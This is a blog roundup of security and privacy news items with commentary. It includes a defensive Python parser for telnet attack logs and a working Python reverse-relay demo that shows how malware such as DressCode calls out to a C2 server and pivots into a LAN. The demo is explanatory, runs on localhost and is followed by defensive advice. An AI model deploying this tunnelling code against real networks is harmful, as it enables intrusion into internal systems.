
More Thoughts on the Yahoo Scan

Marcy Wheeler:

To sum up: ex-Yahoo employees want this story to be about the technical recklessness of the request and Yahoo’s bureaucratic implementation of it. Government lawyers and spooks are happy to explain this was a traditional FISA order, but want to downplay the intrusiveness and recklessness of this by claiming it just involved adapting an existing scan. And intelligence committee members mistakenly believed this scan happened under Section 702, and wanted to make it a 702 renewal fight issue, but since appear to have learned differently.

This is the definitive summary of what Yahoo! (likely) did when it monitored all of its customers’ emails for the US government. Well worth the read, both for its content and to see what goes into a critical media evaluation of an unfolding series of intelligence-related news stories.


Yahoo May Have Exposed Rogers Customer Emails to US Spies

Motherboard:

“Any program that scans all the mail that Yahoo has access to would have scanned this email,” Gillmor wrote me in a message.

“If Yahoo chose to segment their scanning by limiting it only to mails that have ‘@yahoo.com’ email addresses [and omitted those sent from @rogers.com], of course, then they would have chosen to exclude this email from the scan,” Gillmor continued. “It’s not clear to me whether any such constraint was in place, though.”

“I’d imagine that, yes, the program would have applied to Rogers customer emails, unless Yahoo elected to specifically exclude them,” wrote Marczak in an email.

Yahoo declined to comment on whether the alleged system filtered out emails from Rogers customers.

Tobi Cohen, a spokesperson for the Office of the Privacy Commissioner, confirmed that Rogers consulted the office in the wake of the Yahoo hack. But as far as the possibility that Rogers customer emails had been siphoned into a surveillance dragnet goes, “Given we don’t have detailed information about the matter, we are not in a position to comment,” Cohen wrote.

When asked if Rogers was aware of the allegations against Yahoo or if the company is concerned that a backdoor could have affected its customers, spokesperson Garas referred me to Yahoo’s statement and wrote that “as such, we believe this matter is closed.”

Great to know that Rogers thinks it shouldn’t (or, worse, doesn’t have to) explain how one of its contracted service providers may have grossly violated the privacy of Rogers’ customers.


Feds Walk Into A Building. Demand Everyone’s Fingerprints To Open Phones

Forbes:

Legal experts were shocked at the government’s request. “They want the ability to get a warrant on the assumption that they will learn more after they have a warrant,” said Marina Medvin of Medvin Law. “Essentially, they are seeking to have the ability to convince people to comply by providing their fingerprints to law enforcement under the color of law – because of the fact that they already have a warrant. They want to leverage this warrant to induce compliance by people they decide are suspects later on. This would be an unbelievably audacious abuse of power if it were permitted.”

Jennifer Lynch, senior staff attorney at the Electronic Frontier Foundation (EFF), added: “It’s not enough for a government to just say we have a warrant to search this house and therefore this person should unlock their phone. The government needs to say specifically what information they expect to find on the phone, how that relates to criminal activity and I would argue they need to set up a way to access only the information that is relevant to the investigation.”

It’s insane that the US government is seeking chained warrants that authorize expansive searches without specifying what is being sought or the particular rationale for searching it. Such warrants are an absolute violation of due process.

But, at the same time, the government’s actions (again) show how weak the ‘going dark’ arguments are. iPhones and other devices are designed to keep everyone out, yet a fingerprint-unlockable device lets an agent open it without breaking anything: press the owner’s finger to the sensor and the device decrypts itself. This doesn’t mean that fingerprint scanners are bad (most people’s threat model is criminals, snoopy friends and family, and so on, not police), but it does mean that authorities can routinely bypass, rather than break, the cryptography protecting devices and communications. The practical caveat is that biometric unlock is a convenience layered on top of the passcode: a phone that has just been powered off, or that has exceeded its limit of failed fingerprint attempts, demands the passcode instead, so anyone worried about compelled unlocking should power the device down before an encounter.


How hard is it to hack the average DVR? Sadly, not hard at all

Ars Technica:

Johannes B. Ullrich, a researcher and chief technology officer for the SANS Internet Storm Center, wanted to know just how vulnerable these devices are to remote takeover, so he connected an older DVR to a cable modem Internet connection. What he saw next—a barrage of telnet connection attempts so dizzying it crashed his device—was depressing.

“The sad part is, that I didn’t have to wait long,” he wrote in a blog post published Monday. “The IP address is hit by telnet attempts pretty much every minute. Instead of having to wait for a long time to see an attack, my problem was that the DVR was often overwhelmed by the attacks, and the telnet server stopped responding. I had to reboot it every few minutes.”

The Internet of Things should, at this point, mostly be renamed the Internet of Threats.


Brace yourselves—source code powering potent IoT DDoSes just went public

Ars Technica:

Both Mirai and Bashlight exploit the same IoT vulnerabilities, mostly or almost exclusively involving weaknesses involving the telnet remote connection protocol in devices running a form of embedded Linux known as BusyBox. But unlike Bashlight, the newer Mirai botnet software encrypts traffic passing between the infected devices and the command and control servers that feed them instructions. That makes it much harder for researchers to monitor the malicious network. There’s also evidence that Mirai is able to seize control of Bashlight-infected devices and possibly even patch them so they can never be infected again by a rival botnet. About 80,000 of the 963,000 Bashlight devices now belong to Mirai operators, Drew said.

Next time you see a vendor sell you something that can be connected to the Internet, be sure to ask:

  • How long will you be providing support for this product?
  • How will you be pushing security updates to this product?
  • What mitigation strategies have you implemented to ensure that a third-party doesn’t take control of this product?
  • What will you do to help me when this device is compromised because of a vulnerability in this product?

I can almost guarantee that whoever is selling the product will either look at you slack-jawed or reach for buzzwords to signal that the product is secure. But they will almost certainly be unable to genuinely answer the questions, because vendors are not securing their devices. It is these failures that have created the current generation of threats that the global Internet is only now starting to grapple with.
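Ullrich’s DVR experiment above and the Mirai/Bashlight story describe the same symptom from the defender’s side: a steady stream of inbound telnet connection attempts from many sources. The following is an added example, not code from Ullrich’s post, from Ars Technica, or from either botnet. It parses netfilter/iptables-style firewall log lines of the kind a home router or DVR writes to its kernel log, keeps only new-connection SYNs to telnet, and summarizes how often the device is being hit and by whom. The log lines are constructed (RFC 5737 documentation addresses, invented timestamps), and treating port 2323 as telnet alongside 23 is my assumption rather than something the articles state.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample: netfilter/iptables "kernel:" log lines as a DVR or home router
# might emit for inbound packets. Addresses are RFC 5737 documentation ranges and the
# timestamps are invented. The sshd line is noise the parser must skip.
SAMPLE_LOG = """\
Oct 10 12:00:03 dvr kernel: IN=eth0 OUT= SRC=198.51.100.17 DST=192.0.2.10 PROTO=TCP SPT=44210 DPT=23 SYN URGP=0
Oct 10 12:00:09 dvr kernel: IN=eth0 OUT= SRC=203.0.113.44 DST=192.0.2.10 PROTO=TCP SPT=51022 DPT=23 SYN URGP=0
Oct 10 12:00:21 dvr kernel: IN=eth0 OUT= SRC=198.51.100.17 DST=192.0.2.10 PROTO=TCP SPT=44211 DPT=23 SYN URGP=0
Oct 10 12:00:40 dvr kernel: IN=eth0 OUT= SRC=203.0.113.91 DST=192.0.2.10 PROTO=TCP SPT=60001 DPT=2323 SYN URGP=0
Oct 10 12:00:55 dvr kernel: IN=eth0 OUT= SRC=198.51.100.17 DST=192.0.2.10 PROTO=TCP SPT=44212 DPT=80 SYN URGP=0
Oct 10 12:01:02 dvr kernel: IN=eth0 OUT= SRC=203.0.113.44 DST=192.0.2.10 PROTO=TCP SPT=51023 DPT=23 SYN URGP=0
Oct 10 12:01:30 dvr kernel: IN=eth0 OUT= SRC=198.51.100.17 DST=192.0.2.10 PROTO=TCP SPT=44213 DPT=23 SYN URGP=0
Oct 10 12:01:31 dvr kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=192.0.2.10 PROTO=TCP SPT=33001 DPT=23 SYN URGP=0
Oct 10 12:01:40 dvr sshd[200]: Accepted publickey for admin from 192.0.2.5 port 50000
"""

# 23 is telnet; 2323 is a common alternate telnet port (assumption, not from the articles).
TELNET_PORTS = {23, 2323}

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: "
    r".*?\bSRC=(?P<src>\S+) .*?\bPROTO=(?P<proto>\S+) .*?\bDPT=(?P<dpt>\d+)\b(?P<rest>.*)$"
)


def parse_line(line):
    """Return {ts, src, dpt} for a new-connection SYN to a telnet port, else None."""
    m = LINE_RE.search(line)
    if not m or m["proto"] != "TCP":
        return None
    flags = set(m["rest"].split())
    if "SYN" not in flags or "ACK" in flags:      # only fresh connection attempts
        return None
    dpt = int(m["dpt"])
    if dpt not in TELNET_PORTS:
        return None
    return {"ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"), "src": m["src"], "dpt": dpt}


def summarize(log_text, repeat_threshold=3):
    """Aggregate telnet connection attempts: volume, rate, and repeat sources."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    per_source = Counter(e["src"] for e in events)
    per_minute = Counter(e["ts"].strftime("%H:%M") for e in events)
    times = sorted(e["ts"] for e in events)
    mean_gap = (times[-1] - times[0]).total_seconds() / (len(times) - 1) if len(times) > 1 else 0.0
    return {
        "telnet_attempts": len(events),
        "distinct_sources": len(per_source),
        "peak_per_minute": max(per_minute.values(), default=0),
        "mean_gap_seconds": round(mean_gap, 1),
        "repeat_offenders": sorted(s for s, n in per_source.items() if n >= repeat_threshold),
        "per_source": dict(per_source),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On a real gateway, feed it `journalctl -k` or `/var/log/kern.log` output from a box that logs dropped inbound SYNs; even a small sample will show the pattern Ullrich saw, with the mean gap between attempts measured in seconds rather than minutes. The more useful action is upstream of any log: a device that needs no telnet should not have telnetd running at all, and a device that must should never be reachable from the WAN.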


Moto Z Play review: the best battery life of any smartphone today

The Verge:

But the Moto Z Play rarely feels like you’re doing much settling. Even when you add together the negatives like an average camera, Verizon’s annoying bloatware, and Lenovo’s poor track record with software updates, the Moto Z Play’s affordable price, zippy performance, and unbelievable battery life still add up to something very compelling. And yes, unlike the Z and Z Force, there’s even a headphone jack built in. Forget the Z’s before it; this is the practical Moto Z that most people should get. It’s available exclusively from Verizon Wireless for a limited time for $408, but starting in October you can get it unlocked on GSM carriers (and free of carrier bloat) for $450.

The Verge notes that if you buy a Moto Z you’re unlikely to get “software updates”. That doesn’t just mean you won’t get bells and whistles and neat new features as Google releases new versions of its operating system. It also means that Lenovo will not send you security updates. So you’ll have a long-lasting smartphone that stays exposed to trivial attacks, using publicly known and long-since-patched vulnerabilities, that can extract sensitive personal information or otherwise compromise the device.

But other than that, I’m sure it’s a great phone to recommend.


More than 400 malicious apps infiltrate Google Play

Ars Technica:

One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

“This malware allows threat actors to infiltrate a user’s network environment,” Thursday’s report stated. “If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard.”

BYOD: a great cost-saving policy. Until it leads to an attacker compromising your network and potentially exfiltrating business-vital resources.
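To make concrete what “bypassing NAT” with a persistent outbound connection means, here is an added example in Python; it is neither DressCode’s code nor anything from Trend Micro’s report. It is a toy reverse relay with all three roles on 127.0.0.1: an INTERNAL service that in reality would be reachable only on the LAN, a DEVICE that calls out to a C2 (the direction NAT and stateful firewalls allow), and a C2 that uses that call-back to reach the internal service. The control protocol (a CONNECT line, an OK reply) and all names are my own assumptions.

```python
import socket
import threading


def _readline(sock):
    """Read one newline-terminated control line byte by byte (no buffering to lose data)."""
    buf = b""
    while not buf.endswith(b"\n"):
        ch = sock.recv(1)
        if not ch:
            break
        buf += ch
    return buf


def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the EOF propagates onward."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_internal_service():
    """INTERNAL: toy LAN-only service; answers any request with a banner plus the request."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(b"INTERNAL-OK " + conn.recv(1024))

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def device_beacon(c2_host, c2_port):
    """DEVICE: open an outbound connection to the C2 (NAT permits this), take one
    CONNECT command, dial the requested LAN target, and relay both directions."""
    ctl = socket.create_connection((c2_host, c2_port))
    cmd = _readline(ctl).decode().split()
    if len(cmd) != 3 or cmd[0] != "CONNECT":
        ctl.close()
        return
    target = socket.create_connection((cmd[1], int(cmd[2])))
    ctl.sendall(b"OK\n")
    back = threading.Thread(target=_pump, args=(target, ctl), daemon=True)
    back.start()
    _pump(ctl, target)   # C2 -> LAN target
    back.join()          # LAN target -> C2 has drained
    target.close()
    ctl.close()


def start_c2():
    """C2: the Internet-side listener that infected devices call back to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def c2_reach_through_device(c2_srv, target_host, target_port, payload):
    """C2: wait for a device call-back, then use it to talk to a LAN-only target."""
    ctl, _ = c2_srv.accept()
    ctl.sendall(f"CONNECT {target_host} {target_port}\n".encode())
    if _readline(ctl) != b"OK\n":
        ctl.close()
        return None
    ctl.sendall(payload)
    ctl.shutdown(socket.SHUT_WR)
    chunks = []
    while True:
        data = ctl.recv(4096)
        if not data:
            break
        chunks.append(data)
    ctl.close()
    return b"".join(chunks)


def demo():
    """Run all three roles locally and return what the C2 got back from the LAN service."""
    internal_srv, internal_port = start_internal_service()
    c2_srv, c2_port = start_c2()
    dev = threading.Thread(target=device_beacon, args=("127.0.0.1", c2_port), daemon=True)
    dev.start()
    reply = c2_reach_through_device(c2_srv, "127.0.0.1", internal_port, b"GET /payroll")
    dev.join(5)
    c2_srv.close()
    internal_srv.close()
    return reply


if __name__ == "__main__":
    print(demo())  # b'INTERNAL-OK GET /payroll'
```

Nothing here defeats NAT; it simply uses the one direction NAT was always going to allow. The C2 never addresses the internal service itself, so ingress rules and the absence of a public address protect nothing once a device on the inside is willing to dial out and relay. The corresponding controls are on the other side: put BYOD devices on a segment with no route to internal servers, restrict egress to what the business actually needs, and look for long-lived outbound connections from phones to unfamiliar hosts.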


Organizational Doxing and Disinformation – Schneier on Security

From Bruce Schneier:

Major newspapers do their best to verify the authenticity of leaked documents they receive from sources. They only publish the ones they know are authentic. The newspapers consult experts, and pay attention to forensics. They have tense conversations with governments, trying to get them to verify secret documents they’re not actually allowed to admit even exist. This is only possible because the news outlets have ongoing relationships with the governments, and they care that they get it right. There are lots of instances where neither of these two things are true, and lots of ways to leak documents without any independent verification at all.

No one is talking about this, but everyone needs to be alert to the possibility. Sooner or later, the hackers who steal an organization’s data are going to make changes in them before they release them. If these forgeries aren’t questioned, the situations of those being hacked could be made worse, or erroneous conclusions could be drawn from the documents. When someone says that a document they have been accused of writing is forged, their arguments at least should be heard.

As someone who routinely receives, and consults on, leaked documents I can emphatically say this is a serious issue. And that journalists are generally very cautious these days about publishing based on mysteriously sourced documents.


France’s Emergency Powers: The New Normal

Just Security:

The new, six-month extension of emergency powers creates France’s longest state of emergency since the Algerian War in the 1950s. The new law restores or extends previous emergency provisions, such as empowering police to carry out raids and local authorities to place suspects under house arrest without prior judicial approval. It also expands those powers, for example allowing the police to search luggage and vehicles without judicial warrants. In addition it reinstates warrantless seizures of computer and cellphone data that France’s highest legal authority had struck down as unconstitutional, adding a few restrictions that still fall short of judicial oversight.

In separate reports in February, Human Rights Watch and Amnesty International documented more than three dozen cases in which the use of these emergency powers violated universal rights to liberty, privacy, or freedoms of movement, association and expression. The two groups also found that the emergency acts lost suspects jobs, traumatized children, and damaged homes. The vast majority of those targeted were Muslims. Those interviewed said the actions left them feeling stigmatized and eroded their trust in the French authorities. The latest version of the emergency law risks compounding these effects.

Advancing unconstitutional and discriminatory ‘security’ laws and policies in the wake of serious crimes threatens to undermine democracies while potentially strengthening states. Worryingly, fewer and fewer loud voices defend the rough-and-tumble consequences of maintaining a democratic form of governance, as against those who insist that a powerful state apparatus is required if normalcy is to exist. The result may be a sleepwalk from governments of and by the people to governments that protect citizen-serfs and harshly discriminate against difference.


WSJ Reporter: Homeland Security Tried to Take My Phones at the Border

Motherboard:

“Travel ‘naked’ as one encryption expert told me. If any government wants your information, they will get it no matter what,” she adds.

Something has gone terribly awry if this is the advice that journalists working for international news outlets are giving to those entering or exiting the United States.